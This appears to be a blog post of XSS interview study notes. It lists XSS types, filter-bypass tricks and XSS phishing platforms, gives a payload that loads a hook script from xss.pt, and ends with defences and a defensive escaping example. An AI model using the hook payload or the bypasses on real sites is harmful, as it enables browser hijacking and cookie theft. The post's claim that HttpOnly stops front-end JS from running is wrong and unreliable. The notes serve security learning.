XSS (cross site scripting attack) for security interview
2022-07-06 14:16:00 【Unknown white hat】
1、XSS principle: developers did not filter input properly, so a tag can be closed and malicious JS code inserted and executed
2、XSS type classification
DOM type: arises when the DOM document is parsed
Reflected type: takes effect as soon as it is inserted; not stored in the database
Stored type: stored in the database, causing persistent attacks
3、Frequently used JS functions
document.cookie: pops up the browser cookie for the current URL
console.log('xss'): writes a log message to the console
4、Bypass methods
4.1. Change case: <SCript>
4.2. Encoding bypass (HTML entity encoding; decimal, hexadecimal and octal encoding; Unicode encoding)
4.3. Close the tag: use the greater-than sign > to close the tag so that the XSS takes effect
4.4. Double-write bypass: <scr<script>ipt>
4.5. Use spaces, line breaks, tab characters, or forms such as /**/ and /*!a*/ to bypass keyword detection
4.6. Use / instead of spaces
4.7. Use backticks instead of parentheses and double quotes
4.8. Use throw instead of parentheses
4.9. Use HTML entity encoding instead of a colon
4.10. Use JSFuck encoding to bypass most character filtering
5、Scanning tool
XSStrike
6、XSS phishing platforms
Kali tool: BeEF
Free platform: https://xss.pt/
Phishing statement: <img src=https://xss.pt/hook.js>
7、XSS defense
7.1、Filter sensitive characters, for example: alert(), <script>, onerror
7.2、Add HttpOnly: prohibits the front end from executing JS code
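An added example (not from the original post) relating the filtering in 7.1 to the bypass forms in 4.1 and 4.4: a single-pass, case-sensitive keyword filter leaves a live script tag for both forms, while HTML output encoding, a technique swapped in here that the post does not list, neutralizes them. The helper names naiveFilter, escapeHtml, hasScriptTag and compare are hypothetical, and the sample inputs are constructed.

```javascript
// Added example. Helper names are hypothetical; sample inputs are constructed
// from the case-change (4.1) and double-write (4.4) forms listed on the page.

// Weak defense: one case-sensitive pass deleting the literal script tags.
function naiveFilter(input) {
  return input.replace(/<script>/g, "").replace(/<\/script>/g, "");
}

// Stronger defense: encode every character that is significant in HTML
// text and quoted-attribute context before writing it into the page.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// True if the output still contains an opening script tag a browser would parse.
function hasScriptTag(html) {
  return /<script[\s>\/]/i.test(html);
}

const samples = [
  "<SCript>console.log('xss')</SCript>",                  // 4.1 change case
  "<scr<script>ipt>console.log('xss')</scr</script>ipt>", // 4.4 double write
];

// Run both defenses over each input and report whether a script tag survives.
function compare(inputs) {
  return inputs.map((s) => ({
    input: s,
    filteredStillLive: hasScriptTag(naiveFilter(s)),
    escapedStillLive: hasScriptTag(escapeHtml(s)),
  }));
}

console.log(compare(samples));
```

The double-write input is the instructive case: deleting the inner tag reassembles a complete outer tag, so removal-based filters need to loop until the output stops changing or, better, be replaced by encoding at the point of output.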